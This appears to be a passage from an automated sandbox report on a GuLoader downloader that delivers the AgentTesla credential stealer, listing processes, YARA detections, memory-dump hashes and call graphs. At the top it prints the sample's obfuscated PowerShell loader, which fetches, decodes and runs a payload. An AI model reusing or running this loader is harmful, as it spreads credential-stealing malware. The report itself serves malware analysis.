',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
                                    Imagebase:0x5e0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.2919321134.0000000008200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.2919733703.00000000096F5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:21
                                    Start time:03:52:36
                                    Start date:03/07/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:03:52:51
                                    Start date:03/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                    Imagebase:0xe20000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.3758847608.000000002303A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.3758847608.000000002300F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:24
                                    Start time:03:53:12
                                    Start date:03/07/2024
                                    Path:C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
                                    Imagebase:0x160000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    • Detection: 0%, Virustotal, Browse
                                    Reputation:high
                                    Has exited:true

                                    Target ID:25
                                    Start time:03:53:14
                                    Start date:03/07/2024
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    Imagebase:0x7ff6ef9b0000
                                    File size:71'680 bytes
                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:27
                                    Start time:03:53:20
                                    Start date:03/07/2024
                                    Path:C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
                                    Imagebase:0x160000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3192864596.00007FFAAC220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC220000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac220000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e90b8238b04361b81c9cb87337b94593ee437bbd6dfb065c214d05e08984d91
                                      • Instruction ID: 94547bf6e43d98e6ffa5519444a3cd25c19e1fe3186e4d5381c58d21aa04cbc7
                                      • Opcode Fuzzy Hash: 8e90b8238b04361b81c9cb87337b94593ee437bbd6dfb065c214d05e08984d91
                                      • Instruction Fuzzy Hash: A7F1A670909A4D8FEBA8EF28C855BF937D1FF55310F04826AE84EC7395DB3499458B81
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3192864596.00007FFAAC220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC220000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac220000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a861eafdc600d34921f4dbbdb86736802e166a239551bc231d66ff2950c2482
                                      • Instruction ID: 4ad9441e787667485cac069917c1897c894b35fa7d1fdf4cba19a862f37813b9
                                      • Opcode Fuzzy Hash: 2a861eafdc600d34921f4dbbdb86736802e166a239551bc231d66ff2950c2482
                                      • Instruction Fuzzy Hash: ECE1C270908A4D8FFBA8EF28C8557E977D1FF95310F04826AE84DC7295DE74E8498B81
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3193870162.00007FFAAC2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac2f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01fa471554c00b86a04bfea3dbd30e9a209457248434c683d45377ee0ccefcc5
                                      • Instruction ID: c94049bf329c78355a34a4b47f49814f2fffd93ff5ae48c7c580cae013124239
                                      • Opcode Fuzzy Hash: 01fa471554c00b86a04bfea3dbd30e9a209457248434c683d45377ee0ccefcc5
                                      • Instruction Fuzzy Hash: B5E1687690EB8E8FF795EB2888555B87BE1EF56210B1841BED04DC32D7DA18D81C8BC1
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3193870162.00007FFAAC2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac2f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3790bd21fe62b84bcfa20a54f9a49469d444d16d1ada47a032ddd6d8af2e6df4
                                      • Instruction ID: 7a182f4f66b28763bd7b5991354e8c1404c18e60d816479c917ff17c07038aaa
                                      • Opcode Fuzzy Hash: 3790bd21fe62b84bcfa20a54f9a49469d444d16d1ada47a032ddd6d8af2e6df4
                                      • Instruction Fuzzy Hash: 06D15362A0EB8ECFF795A72888555B47BD1EF56620B0840BAD04DC72D7ED1AD81C87C1
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3193870162.00007FFAAC2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac2f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c00e5162488044b9ecddd4693867385e518e3b44b3e463a3103517323957904
                                      • Instruction ID: 9246decc1904625ca4dcb0e6fef141d1f186387c44c818fc17480355040005f9
                                      • Opcode Fuzzy Hash: 0c00e5162488044b9ecddd4693867385e518e3b44b3e463a3103517323957904
                                      • Instruction Fuzzy Hash: 9951C46690FB8F9FF795A72848605B8AAE1EF57220B5841BDD04DC32D6DD18D81C8BC2
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3193870162.00007FFAAC2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac2f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4cf657283f247afa20193114bb35e88f069fb7f301c8e107a8b38d00c37ae938
                                      • Instruction ID: 71b28d49991a9334bab9c4e3b3ad538ceaa3929434f1fb3d608a2989fbcad816
                                      • Opcode Fuzzy Hash: 4cf657283f247afa20193114bb35e88f069fb7f301c8e107a8b38d00c37ae938
                                      • Instruction Fuzzy Hash: E2315752D0FBCFDBF3A5A7685C515B8AAC1AF02A20B1845B9D04DD32D7DD09DC1C96C2
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3192864596.00007FFAAC220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC220000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffaac220000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: ef026f12c4077f2ffbb0160e62af7cce89e0ca7fe1267bf51d277e2910109160
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: EA01847011CB088FDB48EF0CE051AA5B3E0FB89320F10052EE58AC3661DA32E881CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V0k
                                      • API String ID: 0-3448288039
                                      • Opcode ID: 04e329bcfa9db4994065e476179e4e3b49ad1cf4ea666ffe7e3e8be34faacaab
                                      • Instruction ID: 9f77b0ead7b3b5babe9010ac070fa32e25fb91cd150c867c95ca40d6ea3d3387
                                      • Opcode Fuzzy Hash: 04e329bcfa9db4994065e476179e4e3b49ad1cf4ea666ffe7e3e8be34faacaab
                                      • Instruction Fuzzy Hash: 2FB14C70E042198FDF64CFA9D8857AEBBF2BF88314F148129D915E7794EB749841CB82
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 389899522da4a48a50cf92ed02a346b8a970c22782a7fb2a9466639f8ba0c09e
                                      • Instruction ID: c97bed20a4d6c4aabadcd292dac9246cb475950cef1b5e380ba6e50fb30ba310
                                      • Opcode Fuzzy Hash: 389899522da4a48a50cf92ed02a346b8a970c22782a7fb2a9466639f8ba0c09e
                                      • Instruction Fuzzy Hash: AAB19C71E04209CFDB64CFA9C89179EBBF2AF88314F148529D914EB794EF349841CB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8N0k$Hq$h]0k$h]0k$h]0k$$q$$q$I0k
                                      • API String ID: 0-304494732
                                      • Opcode ID: f5e588b5c01ee2e006f05145ab33953db54bd6cfd3637373d227bc9c44651fad
                                      • Instruction ID: 07e493106b4909ca718fe610de61c3e030a2087e44b5349c45841fd5d567038f
                                      • Opcode Fuzzy Hash: f5e588b5c01ee2e006f05145ab33953db54bd6cfd3637373d227bc9c44651fad
                                      • Instruction Fuzzy Hash: 2B225034B042188FCB66EB34D8547AEB7B2AF89344F1480AAD50AAB361DF35DD45CF81
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bfcfaa04d392c48cb958d268cd955688930eed05ab5b2528d0fcbd35dbcf518
                                      • Instruction ID: 4c212454feddbb97106d9ecc8ed245e7201d6dd4c766ce883f5f9341a72dd8ec
                                      • Opcode Fuzzy Hash: 3bfcfaa04d392c48cb958d268cd955688930eed05ab5b2528d0fcbd35dbcf518
                                      • Instruction Fuzzy Hash: 96D12774A04218DFDB54CF98D484A9EFBB2FF88314F598159E909AB351C731ED82CB90
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e4677ec80d7eb176674f883079ab20a084ced02a5107cf02a9a1333419967f1
                                      • Instruction ID: f69a2d5a1d093b5667b161b2d5606600047450d0d5e45b4f2c1712429129cb78
                                      • Opcode Fuzzy Hash: 5e4677ec80d7eb176674f883079ab20a084ced02a5107cf02a9a1333419967f1
                                      • Instruction Fuzzy Hash: 2DD10774A04219DFDB54CF98D494AAEFBB2FF88314F248159EA05AB355C731ED82CB90
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 484ef41348998829ab6d83543fdada648a907dbc2ac2cde6f91d4e440ae901c5
                                      • Instruction ID: 765a133250a7239f385ca17ede55a1a7f521abacf5abfc3b0df87cbd7712cf35
                                      • Opcode Fuzzy Hash: 484ef41348998829ab6d83543fdada648a907dbc2ac2cde6f91d4e440ae901c5
                                      • Instruction Fuzzy Hash: F2C18A35A04248CFCB15DFA8C884B9DBBB2FF85314F158559EA06AB365DB34ED49CB80
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 980bb88ad1b2db922d5059a4575fca6cd491ba2fcd5da714149846b01e558f54
                                      • Instruction ID: 4756b435e2c7b124b9a45d779623929c679cb4a72006d58f08f8e8514b1e7904
                                      • Opcode Fuzzy Hash: 980bb88ad1b2db922d5059a4575fca6cd491ba2fcd5da714149846b01e558f54
                                      • Instruction Fuzzy Hash: 5291BF74A04605CFCB55CF99C494AAAFBB1FF49314B24825AD915EB3A6C335EC81CBA0
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9057d7691ac92e2efb504ccb4f18d494f3eabbbd9baab44ed79866e4cceac78d
                                      • Instruction ID: 867b7e43ea9bd292a77ba1c7a534c409e3b5cd637989ba6025af3255cf189223
                                      • Opcode Fuzzy Hash: 9057d7691ac92e2efb504ccb4f18d494f3eabbbd9baab44ed79866e4cceac78d
                                      • Instruction Fuzzy Hash: DF71BD30A09244DFCB15CFA4D884AADBBF2FF8A304F1985A9E545AB361C731EC85CB51
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28bf241f210ef098878d9f7c6a463a33fc688fe6a60b31c1ba0b93f3a3bc8677
                                      • Instruction ID: cb947b1c296e4b6058999605ce4baf0c5021278dcc9c4e52f2df268c454ba56a
                                      • Opcode Fuzzy Hash: 28bf241f210ef098878d9f7c6a463a33fc688fe6a60b31c1ba0b93f3a3bc8677
                                      • Instruction Fuzzy Hash: A771AE30A04208CFDB15DFA8C884A9DBBF6FF85314F248969D519DB751EB70AC4ACB80
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 577ba3d00ca85db35d9a7599940ca074ea9d2473d2d0537e2eb942369f194986
                                      • Instruction ID: aef42cb725f50514438bbbca86c61a3b49ff1db278969fe7045baf4297fe5ef5
                                      • Opcode Fuzzy Hash: 577ba3d00ca85db35d9a7599940ca074ea9d2473d2d0537e2eb942369f194986
                                      • Instruction Fuzzy Hash: 81419F31A44204CFD714DB35C858BAD7BF2BF89754F148469E506EB7A0DB309C45CB51
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909596135.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_27f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f03829010c437997d8d5f6067bb21462a7381175bd7858d6c0a562122d14a83
                                      • Instruction ID: e863a1faefd8aca5dbc54e1ee7ad32837e39d71c9f0ecc27f43fe3ea9033ce99
                                      • Opcode Fuzzy Hash: 3f03829010c437997d8d5f6067bb21462a7381175bd7858d6c0a562122d14a83
                                      • Instruction Fuzzy Hash: 16218C74E042499FCB01CF59D894AAABBB5FF49300B04809AE909EB362C735ED45CBA0
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909313537.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_275d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 365804fe5739c09d704f3db46fce0597bb9c12e9a64527deb11b6029d40a6d90
                                      • Instruction ID: b0fbde7a670925ebb4f861a0c4cc2e149ce49fbb10728e6de07b21ab46d1027c
                                      • Opcode Fuzzy Hash: 365804fe5739c09d704f3db46fce0597bb9c12e9a64527deb11b6029d40a6d90
                                      • Instruction Fuzzy Hash: 4201F2315083649AE7304E21CCC4B66FF98DF41225F08C01AED4C1B282C3B89846CAB2
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909313537.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_275d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5127d5acd8911472bdd7d6bef2ed5614ce9e04560cdf6e966a882641fc7db33c
                                      • Instruction ID: 0c2f05676d2e398071dbe2c7d2ef5bcafdf73914e4a1c1d2dd2a6c064adbe510
                                      • Opcode Fuzzy Hash: 5127d5acd8911472bdd7d6bef2ed5614ce9e04560cdf6e966a882641fc7db33c
                                      • Instruction Fuzzy Hash: C5F06D72405354AEEB208E16C984B62FFA8EF41635F18C55AED4C5B286C3B9A845CAB1
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2909313537.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_275d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f1eed46e8b0fe391d23c9048d289d43d02a2df801b49cbe4456865ce16457e2
                                      • Instruction ID: 86b32339ba1c53f3dbb0aebd7f864385a5b7285f13febc7dc90432eb2d0ae1e8
                                      • Opcode Fuzzy Hash: 9f1eed46e8b0fe391d23c9048d289d43d02a2df801b49cbe4456865ce16457e2
                                      • Instruction Fuzzy Hash: 9C21F172504240EFDB259F10D9C0B2BFBA5FB88314F2486A9ED091A246C37AD456CBA2

                                      Execution Graph

                                      Execution Coverage:17.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:19
                                      Total number of Limit Nodes:2
                                      execution_graph 4591 323fcb0 4594 323fce0 4591->4594 4595 323fd22 4594->4595 4597 323fcca 4594->4597 4596 323fd7a CallWindowProcW 4595->4596 4595->4597 4596->4597 4611 3237250 4612 3237258 DeleteFileW 4611->4612 4614 32372d7 4612->4614 4598 3230848 4600 323084e 4598->4600 4599 323091b 4600->4599 4602 3231380 4600->4602 4604 3231373 4602->4604 4603 323137d 4603->4600 4604->4603 4606 3237309 4604->4606 4607 32372a4 4606->4607 4610 323730e 4606->4610 4608 32372aa DeleteFileW 4607->4608 4607->4610 4609 32372d7 4608->4609 4609->4604 4610->4604

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 37 3237309-323730a 38 323732e-3237331 37->38 39 323730c 37->39 40 3237332-3237333 38->40 41 3237364-3237367 38->41 42 32372a4-32372d5 DeleteFileW 39->42 43 323730e 39->43 45 3237336 40->45 47 3237377-323737a 41->47 48 3237369 call 3237cc0 41->48 52 32372d7-32372dd 42->52 53 32372de-3237306 42->53 43->40 44 3237310-3237312 43->44 44->45 49 3237314-3237316 44->49 54 323733a-3237347 45->54 50 32373b6-32373b9 47->50 51 323737c-32373b1 47->51 58 323736f-3237372 48->58 49->54 55 3237318-323732c 49->55 56 32373bb-32373c2 50->56 57 32373cd-32373cf 50->57 51->50 52->53 63 3237349-323734b 54->63 64 323734d 54->64 55->38 59 323748b-3237492 56->59 60 32373c8 56->60 61 32373d1 57->61 62 32373d6-32373d9 57->62 58->47 67 32374a1-32374a7 59->67 68 3237494 59->68 60->57 61->62 62->38 69 32373df-32373ee 62->69 70 3237350-323735f 63->70 64->70 71 323749a 68->71 74 32373f0-32373f3 69->74 75 3237418-323742e 69->75 70->41 71->67 77 32373fb-3237416 74->77 75->59 77->74 77->75
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000), ref: 032372C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3741536370.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_3230000_wab.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID: LRq
                                      • API String ID: 4033686569-3187445251
                                      • Opcode ID: 2a9d61118533ccd7b414f705b7d5981403197b1b95460db65b95ec314af5aafc
                                      • Instruction ID: c72f71172b1e0c3671ebd34befe28296f832976934c91be4ca40dce9c64030b8
                                      • Opcode Fuzzy Hash: 2a9d61118533ccd7b414f705b7d5981403197b1b95460db65b95ec314af5aafc
                                      • Instruction Fuzzy Hash: 534180B0E2021ACBDF24CF69C4407AEBBB5EF4A310F248559E911F7250E774A981CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
